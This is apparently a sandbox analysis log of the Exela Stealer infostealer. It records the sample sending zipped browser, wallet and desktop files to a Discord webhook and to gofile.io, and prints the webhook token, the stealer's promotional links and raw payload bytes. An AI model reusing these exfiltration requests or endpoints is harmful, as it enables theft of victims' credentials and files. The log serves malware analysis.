                                                                                                                                                                                                                                                          Data Ascii: {"username": "Exela Stealer", "embeds": [{"title": "***Exela Stealer***", "description": "***Keyword Result***", "url": "https://t.me/ExelaStealer", "color": 0, "footer": {"text": "https://t.me/ExelaStealer | https://github.com/quicaxd/Exela-V2.0"}, "thum
                                                                                                                                                                                                                                                          2024-04-24 17:24:20 UTC1365INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                          Date: Wed, 24 Apr 2024 17:24:20 GMT
                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                          Content-Length: 45
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          set-cookie: __dcfduid=7c49fd12025f11efbdd8ee7b659d56a8; Expires=Mon, 23-Apr-2029 17:24:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                          x-ratelimit-limit: 5
                                                                                                                                                                                                                                                          x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                          x-ratelimit-reset: 1713979461
                                                                                                                                                                                                                                                          x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                          via: 1.1 google
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d13Kl274CV7G76C%2Ft8Na4Gy%2Fhu6x4Cje3c0er8fa6KYbZLuuBMjuobnDEek3ZJ4eq91RxNxYVn3xnNSMGmxve6lZQKNl%2BUFBC8jkdp4Ob4ouxwLztCV0MLHH0zER"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                          Set-Cookie: __sdcfduid=7c49fd12025f11efbdd8ee7b659d56a8d44545b7b642815a6a554183e4e71fc97bf076171c2e94722355f6e2d4d6f95a; Expires=Mon, 23-Apr-2029 17:24:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                          Set-Cookie: __cfruid=0f8d95718fc85af237794a7b11ac27ff3aa11215-1713979460; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                          2024-04-24 17:24:20 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 6f 4d 67 56 50 78 59 31 5a 7a 6a 57 6d 32 35 49 37 6d 4c 41 51 68 44 79 61 6e 2e 6d 34 47 34 58 37 31 72 54 4d 69 4f 59 43 47 63 2d 31 37 31 33 39 37 39 34 36 30 32 35 32 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 37 39 37 63 39 34 39 64 62 39 66 61 39 38 32 2d 4c 41 53 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: Set-Cookie: _cfuvid=oMgVPxY1ZzjWm25I7mLAQhDyan.m4G4X71rTMiOYCGc-1713979460252-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8797c949db9fa982-LAS
                                                                                                                                                                                                                                                          2024-04-24 17:24:20 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                          Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          2192.168.2.449755162.159.137.2324436816C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-04-24 17:24:20 UTC633OUTPOST /api/webhooks/1232453561850531851/OBetju49bFsNbzWeG3Y_1O_or46pmBaTOUd7HjjHcO5X_BaLZ2C-YJ8xGzkF6VbqbsY0 HTTP/1.1
                                                                                                                                                                                                                                                          Host: discord.com
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                          User-Agent: Python/3.11 aiohttp/3.9.3
                                                                                                                                                                                                                                                          Cookie: __cfruid=22bfe7b5e874aa62114a8089515824a77160f218-1713979459; __dcfduid=7bd0627c025f11efa7d31a4199c9fe48; __sdcfduid=7bd0627c025f11efa7d31a4199c9fe48c4f5e57f9711b81ede957149357073dc7775ed4571b99598883e1a480d310fd4; _cfuvid=iSSTra6h3U5iw7W1gDFC.BgHgfPUt5GUkSXy1cs3LF4-1713979459456-0.0.1.1-604800000
                                                                                                                                                                                                                                                          Content-Length: 709290
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=514ae93ad84247f78c4fa101542c269c
                                                                                                                                                                                                                                                          2024-04-24 17:24:20 UTC36OUTData Raw: 2d 2d 35 31 34 61 65 39 33 61 64 38 34 32 34 37 66 37 38 63 34 66 61 31 30 31 35 34 32 63 32 36 39 63 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: --514ae93ad84247f78c4fa101542c269c
                                                                                                                                                                                                                                                          2024-04-24 17:24:20 UTC164OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 37 31 34 33 34 44 35 36 2d 31 35 34 38 2d 45 44 33 44 2d 41 45 45 36 2d 43 37 35 41 45 43 44 39 33 42 46 30 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 37 30 39 30 35 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: Content-Type: application/octet-streamContent-Disposition: form-data; name="file"; filename="71434D56-1548-ED3D-AEE6-C75AECD93BF0.zip"Content-Length: 709050
                                                                                                                                                                                                                                                          2024-04-24 17:24:20 UTC16384OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 08 9b 98 58 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 42 72 6f 77 73 65 72 73 2f 50 4b 03 04 14 00 00 00 00 00 07 9b 98 58 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 57 61 6c 6c 65 74 73 2f 50 4b 03 04 14 00 00 00 08 00 08 9b 98 58 6f 82 ea 5f 28 85 0a 00 47 ca 0a 00 0f 00 00 00 44 69 73 70 6c 61 79 20 28 31 29 2e 70 6e 67 6c bb 79 3c 94 fd 1f ff 7b cd 34 62 a8 30 12 b2 67 24 4b 26 95 7d 99 11 c5 d0 6d 44 96 10 85 92 54 b6 c8 60 98 64 27 6b 22 db 28 ba ed 5b 96 b8 ed fb 9e 25 bb 6c 63 df b7 31 18 8c 33 ee ef fd 3b e7 3c 1e e7 fc e1 71 19 33 d7 70 b9 5e ef d7 fb f9 fa 7c de 13 a4 ab a3 71 9e f1 32 23 00 00 e7 d1 9a ea 7a 00 40 47 fb 16 02 30 9c a5 1d aa a3 49 6a b4 03 c8 59 4f e3 0e 90 f7 8b 67 e9 f4 29 1b d5 bf 54
                                                                                                                                                                                                                                                          Data Ascii: PKXBrowsers/PKXWallets/PKXo_(GDisplay (1).pngly<{4b0g$K&}mDT`d'k"([%lc13;<q3p^|q2#z@G0IjYOg)T
                                                                                                                                                                                                                                                          2024-04-24 17:24:20 UTC16384OUTData Raw: e1 35 97 9e d7 ec bb bb 11 63 86 1a 12 0f 42 46 0d 29 d2 42 e3 b1 a7 62 3c 38 08 f0 41 00 f4 59 27 f5 51 4c f1 0c b5 ef 7e df 02 8c 6a c8 f7 0b 2c 31 9a 40 3d b7 c7 1b fe 37 65 9b b2 e7 77 b8 83 81 55 7f 26 c9 32 81 ca 93 3a fa 33 84 bb cd 46 f9 8f fe 08 98 52 9f 37 3b 4f d3 cb 4a 9c 97 a5 be 31 88 f2 cc fc 78 34 45 11 b6 d5 c1 12 e4 57 e8 84 4e 93 a3 56 bc 56 7f e2 db 28 f1 4d ff 0e 7f 38 a0 8a d8 04 c2 b6 dd e5 93 52 94 ff 85 9e c7 88 2d 5f 8b b0 bd 2a a2 87 d4 0d 72 38 d5 d5 f4 b8 25 79 62 8f 31 52 f6 e1 e9 d3 a7 49 03 6e 21 fe ef e8 24 a9 e8 ff 7c f8 f3 d0 64 ba ad 4a c7 d8 02 ac 7b fa 11 4f a5 03 7a ef 6b 60 dd 99 07 a0 c5 1d 5a b6 ae b2 aa fb ac a0 97 4f 17 e5 7d 85 03 4f 3b 29 d4 d1 9a d0 c4 e6 7d c9 00 2c 23 c4 81 fb f6 c8 cc d9 f5 8f 0e e0 4e c2
                                                                                                                                                                                                                                                          Data Ascii: 5cBF)Bb<8AY'QL~j,1@=7ewU&2:3FR7;OJ1x4EWNVV(M8R-_*r8%yb1RIn!$|dJ{Ozk`ZO}O;)},#N
                                                                                                                                                                                                                                                          2024-04-24 17:24:20 UTC16384OUTData Raw: 25 a5 2e 67 87 ab 2d 1e b4 5e fb 22 71 5e 37 5e 07 aa 8d dc 2d 1a f5 38 4c f5 56 88 44 bc 99 2d e3 b2 03 8f 6a ff 7c bd f0 ec a6 8e 93 36 97 c0 8f c2 5a b6 f3 c0 f4 93 f8 72 79 31 70 af e1 be fe de 48 e9 b6 4d 52 55 32 c4 9c 4f 66 0b be 30 f7 c0 50 9c 96 5c 65 28 a5 61 a2 89 04 e4 7e 97 b6 a5 17 a4 37 78 58 fc 94 58 77 43 ee 7b 0b 73 95 ad 43 72 67 84 b9 a0 ba c8 79 05 db 5d ab 37 5c 74 1c 53 b2 be 65 b8 47 07 0d f0 6c 7e bb f4 f5 bb 71 97 e9 a2 34 15 62 8d 2e 93 32 f6 4f ed 95 7d ad ed 9d 86 af e9 1d d1 62 b4 d9 81 b2 06 ef 68 4a cd c0 7f 97 46 57 e3 1f 09 fa 11 1f 26 8c 54 7d cd 5f 59 3a 7b cb e5 1c 6c 51 ed f8 c2 b3 a0 ab 3d ff bc b4 fa 26 3d 0d 9f 03 ce 18 bb 68 24 20 d1 0b 72 07 35 29 46 bb 03 e4 ad aa 50 9f 5b eb 45 b4 fc 79 fe 39 0e 0a da c3 50 42
                                                                                                                                                                                                                                                          Data Ascii: %.g-^"q^7^-8LVD-j|6Zry1pHMRU2Of0P\e(a~7xXXwC{sCrgy]7\tSeGl~q4b.2O}bhJFW&T}_Y:{lQ=&=h$ r5)FP[Ey9PB
                                                                                                                                                                                                                                                          2024-04-24 17:24:20 UTC16384OUTData Raw: 04 8c 0c 27 70 20 b4 57 90 83 04 9d 43 a4 13 4f d1 7e da fe cc a2 67 e0 3a 36 80 97 6d 90 10 4e d5 9b ba b9 63 90 3e 59 d0 28 6e 7a be 50 98 fc 49 d3 cc b9 cc 42 46 c2 19 94 33 b1 15 b7 99 cf c1 f3 1a 6f 7d 0b 19 8e 3c b6 8f 4e 04 b9 4f f0 85 82 03 c0 be a9 c1 96 14 20 53 92 25 38 e9 15 84 5d 4b 6c 45 86 bb f3 66 ce b5 91 21 35 01 c2 1c 36 3d 28 56 7a f7 4c 07 e1 c4 1b 0b ea 4d 99 4e 08 8f 5e b7 d1 b8 e4 f6 6a 0a aa 97 bd 4b 9b d8 6d 30 ef b5 3d 32 3f 38 02 39 3f df 2e c1 06 8f d1 73 d2 52 30 53 65 7c d5 d3 67 96 3a 78 ed d8 2f 2b 80 02 1e 63 d1 f5 51 0e 39 b1 3a b6 5d 88 64 80 79 4e 22 cd 0d ce 7e f5 9e c4 ca 12 df f7 bd 81 40 0a 38 34 d0 14 1a ce 25 27 db 15 95 ad b7 ae e2 f9 4e dc 2b 46 27 79 7f e8 74 af c2 19 76 d7 43 73 90 ae ed ed 6e ad 18 35 4a b8
                                                                                                                                                                                                                                                          Data Ascii: 'p WCO~g:6mNc>Y(nzPIBF3o}<NO S%8]KlEf!56=(VzLMN^jKm0=2?89?.sR0Se|g:x/+cQ9:]dyN"~@84%'N+F'ytvCsn5J
                                                                                                                                                                                                                                                          2024-04-24 17:24:20 UTC16384OUTData Raw: 36 f4 7c f4 fb 60 b8 d9 cb 5c 9e f0 4b 33 a4 51 a2 0f 60 ad ac a8 84 03 46 52 4e ec 97 9b 1c ab 23 5e f0 e5 70 87 71 f8 a7 9e 05 3d 88 c4 d6 b1 2e dd a5 85 7b 71 7f ba c3 9a fc 7c 32 09 00 d2 73 69 76 01 cc 7f d1 1a 7a f7 d5 ec 5f da bf 72 46 3a 4c 6f f0 de 0a 72 e6 10 10 f7 9d bb f2 d8 8b 92 6a 77 d8 68 06 12 1b 57 a4 9f a5 06 11 bb 1e 4b 71 75 b9 0a 9e 7b f6 48 8d d4 3a 41 97 ac f3 0b 7c 5c a2 04 94 b4 05 1c 04 ae 88 de 86 01 a1 f7 04 a3 68 e0 9a 3a 4d c0 ef bc 2d f3 e7 0b 8e 39 79 33 50 6e 52 57 84 0f 38 f0 83 4f 77 f5 7f 73 d6 57 d9 39 79 5d 84 1d 3e db 7d 22 40 77 99 35 36 31 61 a9 1c 73 fa 47 41 e3 e7 37 6e c5 14 8f bb 3b 00 d2 e1 36 fe 51 dc 77 2f 60 bf 8f f3 72 1b 4d f8 83 72 5f ee fe 21 b0 4c 36 51 0b f2 d5 8a 95 33 b3 63 7b f8 51 f8 ce 6b c0 95
                                                                                                                                                                                                                                                          Data Ascii: 6|`\K3Q`FRN#^pq=.{q|2sivz_rF:LorjwhWKqu{H:A|\h:M-9y3PnRW8OwsW9y]>}"@w561asGA7n;6Qw/`rMr_!L6Q3c{Qk
                                                                                                                                                                                                                                                          2024-04-24 17:24:20 UTC16384OUTData Raw: 93 d5 47 90 9e 02 a7 7c d6 10 39 3f 88 33 d9 5d 67 24 8d 11 55 97 8f 6f 73 3c 31 10 d9 4f 9f ac 73 39 6a 76 0a 5a 5d 5d 6f e6 8e 0b 5d 7d 92 2d 04 71 4e c6 27 09 d0 79 b6 fe f8 4f 44 28 8a 1c 26 0d 8f 94 d5 5d 3a cd 52 d7 39 b0 3d 76 f7 da bf 27 33 1f cf f5 f1 22 10 ba 36 56 69 44 83 74 70 77 ce eb 31 b9 ff 52 e6 90 03 f4 47 79 a0 b0 42 e4 84 6a b0 b8 0c f3 27 14 ab 74 59 5c ee 9d 7f 38 35 26 f2 a7 be 70 37 c9 4b 05 32 75 69 9e 11 a5 fa 0c ec cd 4a 3d cb a8 c0 69 76 64 8c 9d c8 8b a4 2a 09 67 3e af 85 5c e1 fc 49 41 a8 27 34 87 8d 36 87 59 09 86 1f 14 02 ae b4 f1 8f f7 e0 72 75 e6 71 46 14 e9 80 39 85 50 10 ba 28 ed 36 a9 7f c2 88 9c 3c e5 2e 10 0a 14 0f 7c 06 58 82 45 97 21 61 52 31 f5 81 4c e5 9b 24 ad ad 0d 42 98 0f e1 e6 18 f5 1a 81 f3 8e 9e 73 3c 9c
                                                                                                                                                                                                                                                          Data Ascii: G|9?3]g$Uos<1Os9jvZ]]o]}-qN'yOD(&]:R9=v'3"6ViDtpw1RGyBj'tY\85&p7K2uiJ=ivd*g>\IA'46YruqF9P(6<.|XE!aR1L$Bs<
                                                                                                                                                                                                                                                          2024-04-24 17:24:20 UTC16384OUTData Raw: 62 3e 96 90 6b 33 6a 2a a7 92 11 bf 1e f8 b4 89 31 7b 2c 1a f2 cd cf a7 eb 3f cc 92 42 bb 4f 34 23 99 2e 12 cf c7 92 8b c5 6a 05 fa 50 cc 79 84 10 21 73 08 4b a2 47 31 ce 61 f8 45 2f 55 d7 a7 aa a3 fc 89 c9 c0 7d 57 33 39 fe c2 77 55 0f 2d 83 16 0c 24 17 9c df df bb c8 7f 0d fc d1 fd be 9b f6 ee b2 db db b2 a7 c9 e2 d5 32 91 a5 b6 c7 a2 46 ad e4 af 77 c2 c1 eb d8 b2 c8 7f 23 27 7b e7 76 5a 2a 6a 0f a5 dd 41 09 24 68 0b 2d 9d b8 47 7b d6 71 ba 51 73 96 57 33 d5 b5 36 9c 49 55 92 0a db fc 66 1b 2e 3b 9a 5e 3d 69 6f dc 15 b9 17 84 ec 28 0a d9 72 a6 21 3d 5c 4a e1 19 b6 bb ea 8e ac 2d bd b4 19 52 3e 30 c0 4f 31 be 6b 0d 34 7e c1 39 30 83 60 72 3f b2 f7 cd c1 7a 43 12 97 f7 82 56 94 b3 1f 2c 9f 05 19 54 ee ad 2d 05 ea 64 b2 29 ad 7e ac ef 4b e2 f8 ef ba 54 f8
                                                                                                                                                                                                                                                          Data Ascii: b>k3j*1{,?BO4#.jPy!sKG1aE/U}W39wU-$2Fw#'{vZ*jA$h-G{qQsW36IUf.;^=io(r!=\J-R>0O1k4~90`r?zCV,T-d)~KT
                                                                                                                                                                                                                                                          2024-04-24 17:24:20 UTC16384OUTData Raw: 80 b1 a2 a1 f0 90 e4 40 78 48 39 7b f5 f7 e9 f0 0b 77 03 f7 8e ae eb 0d c7 a9 f5 63 bd fd 9d af 67 17 31 e7 fe 06 9d 82 c3 e6 1d e2 d0 4e ee b5 0f ef 35 fe fd ed 8c b7 fb 12 dd 92 6b 27 8a f4 77 15 b0 10 b9 dd b0 6c 23 3a 38 34 55 7c a5 77 7e b0 4c 91 7d df 45 fc 0a a6 35 5b 91 f5 ef ec ce d5 94 dd 18 b4 ae 51 ef d6 df 59 ee fe cb 4b f9 2c fd 9f 8f 93 f1 23 90 0b 5d 07 9b e0 11 b5 2a ee 97 fc 2e 19 5a 05 5d 6b cf 7c aa ef 64 8e 76 9a 36 be 89 75 6a cc 88 d6 2d 18 35 1a 8e 50 dc a9 fb 91 9b 2c 58 11 dd 6d f3 9e c4 a0 9e 9a f5 97 03 a7 c5 01 c6 23 e6 33 20 75 e2 da 93 fa 45 ff a5 60 23 53 f7 5e fe 26 d3 d5 b3 fd c4 b3 45 cc ef 59 44 61 0f e2 43 c4 2f e1 ef 7f 2d 8e 83 fb 2b 7a ec b2 a3 f2 7a 8f bc 1a 70 6d fc 1c 26 ae 5a c1 14 77 7d 79 03 c7 fc 59 fd 40 3c
                                                                                                                                                                                                                                                          Data Ascii: @xH9{wcg1N5k'wl#:84U|w~L}E5[QYK,#]*.Z]k|dv6uj-5P,Xm#3 uE`#S^&EYDaC/-+zzpm&Zw}yY@<
                                                                                                                                                                                                                                                          2024-04-24 17:24:22 UTC908INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                          Date: Wed, 24 Apr 2024 17:24:21 GMT
                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                          Content-Length: 45
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                          x-ratelimit-limit: 5
                                                                                                                                                                                                                                                          x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                          x-ratelimit-reset: 1713979463
                                                                                                                                                                                                                                                          x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                          via: 1.1 google
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m8Ey646mwNRy1SWKeH6xTZtK15gcdbjSssffHYufv5o%2FsoLMY7RBfTafqs9uXabQkf1jSDu6EpHDpxWSBV%2BK0L58QN01rubBeGE7s52Q7zsk1xkYcl7RhY%2BTvRgR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8797c94d8fe809f3-LAS


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          3192.168.2.44976051.38.43.184436816C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-04-24 17:24:24 UTC132OUTGET /getServer HTTP/1.1
                                                                                                                                                                                                                                                          Host: api.gofile.io
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                          User-Agent: Python/3.11 aiohttp/3.9.3
                                                                                                                                                                                                                                                          2024-04-24 17:24:25 UTC1092INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          Content-Length: 42
                                                                                                                                                                                                                                                          Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                                                                                                                                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                          Date: Wed, 24 Apr 2024 17:24:25 GMT
                                                                                                                                                                                                                                                          Etag: W/"2a-Ai2ZtV5BbiTExK/Yh3OqC+fgWzE"
                                                                                                                                                                                                                                                          Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-Dns-Prefetch-Control: off
                                                                                                                                                                                                                                                          X-Download-Options: noopen
                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                          X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                          X-Xss-Protection: 0
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2024-04-24 17:24:25 UTC42INData Raw: 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 61 74 61 22 3a 7b 22 73 65 72 76 65 72 22 3a 22 73 74 6f 72 65 38 22 7d 7d
                                                                                                                                                                                                                                                          Data Ascii: {"status":"ok","data":{"server":"store8"}}


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          4192.168.2.449761206.168.191.314436816C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-04-24 17:24:26 UTC238OUTPOST /uploadFile HTTP/1.1
                                                                                                                                                                                                                                                          Host: store8.gofile.io
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                          User-Agent: Python/3.11 aiohttp/3.9.3
                                                                                                                                                                                                                                                          Content-Length: 74592
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=8d82131190e24901ad3c1b9b3a3d5f82
                                                                                                                                                                                                                                                          2024-04-24 17:24:26 UTC36OUTData Raw: 2d 2d 38 64 38 32 31 33 31 31 39 30 65 32 34 39 30 31 61 64 33 63 31 62 39 62 33 61 33 64 35 66 38 32 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: --8d82131190e24901ad3c1b9b3a3d5f82
                                                                                                                                                                                                                                                          2024-04-24 17:24:26 UTC150OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 7a 69 70 2d 63 6f 6d 70 72 65 73 73 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 74 65 61 6c 65 64 46 69 6c 65 73 42 79 45 78 65 6c 61 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 37 34 33 36 36 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: Content-Type: application/x-zip-compressedContent-Disposition: form-data; name="file"; filename="StealedFilesByExela.zip"Content-Length: 74366
                                                                                                                                                                                                                                                          2024-04-24 17:24:26 UTC16384OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 0a 9b 98 58 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 44 65 73 6b 74 6f 70 2f 50 4b 03 04 14 00 00 00 00 00 0a 9b 98 58 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 00 44 6f 63 75 6d 65 6e 74 73 2f 50 4b 03 04 14 00 00 00 00 00 0b 9b 98 58 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 00 44 6f 77 6e 6c 6f 61 64 73 2f 50 4b 03 04 14 00 00 00 00 00 0a 9b 98 58 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 4f 4e 42 51 43 4c 59 53 50 55 2f 50 4b 03 04 14 00 00 00 00 00 0a 9b 98 58 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 55 4d 4d 42 44 4e 45 51 42 4e 2f 50 4b 03 04 14 00 00 00 00 00 0a 9b 98 58 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 56 4c 5a 44 47 55 4b 55 54 5a 2f 50 4b 03 04 14 00 00 00 00 00 0a 9b 98 58
                                                                                                                                                                                                                                                          Data Ascii: PKXDesktop/PKXDocuments/PKXDownloads/PKXONBQCLYSPU/PKXUMMBDNEQBN/PKXVLZDGUKUTZ/PKX
                                                                                                                                                                                                                                                          2024-04-24 17:24:26 UTC16384OUTData Raw: 4e 74 cd f5 57 fd 65 b3 41 33 d8 57 78 b4 e7 66 3d 35 ef b7 02 92 1f dd d5 20 8f 81 6a b2 ce 9d e2 4e b4 d7 db e9 89 53 d0 ae 42 ab bd 23 4e 50 d2 f5 ad ea 85 45 ba ec d3 74 da 1b d1 a6 0c ae 4a 56 8d fb 49 b6 05 95 99 a1 b7 7b 82 d5 b7 d5 38 29 11 19 c1 ff 5a 2a d0 9a e5 9a 22 ef ca b5 b8 f3 96 96 1f 64 ed 8c 7c cb 5c ea cf 24 a8 db 6d e1 32 b2 0a 04 79 72 16 2b e0 30 b7 1b dc 28 8e ec 3b 7b 85 24 77 f5 78 f5 49 9a dc 13 6b f5 0b 62 83 a7 47 74 d7 f1 09 28 db 54 b8 bc b7 33 49 d5 29 c4 07 3a 99 95 4e e6 70 54 72 24 d2 4a c0 53 6f ee 20 5f 32 05 5e 5c 12 b7 94 f7 d9 e1 4d a7 0a ba 1d 37 65 e1 1d 59 04 d9 19 eb c3 7e 29 6f 4a 0c 38 e5 9c 5a 9d e8 cb 84 c3 3c fd 46 1e 57 56 c9 34 d0 fa e1 0c be d8 de 4b e9 e6 a4 98 da f7 3d 24 2e d7 8d f6 b9 50 98 3a 0c 15
                                                                                                                                                                                                                                                          Data Ascii: NtWeA3Wxf=5 jNSB#NPEtJVI{8)Z*"d|\$m2yr+0(;{$wxIkbGt(T3I):NpTr$JSo _2^\M7eY~)oJ8Z<FWV4K=$.P:
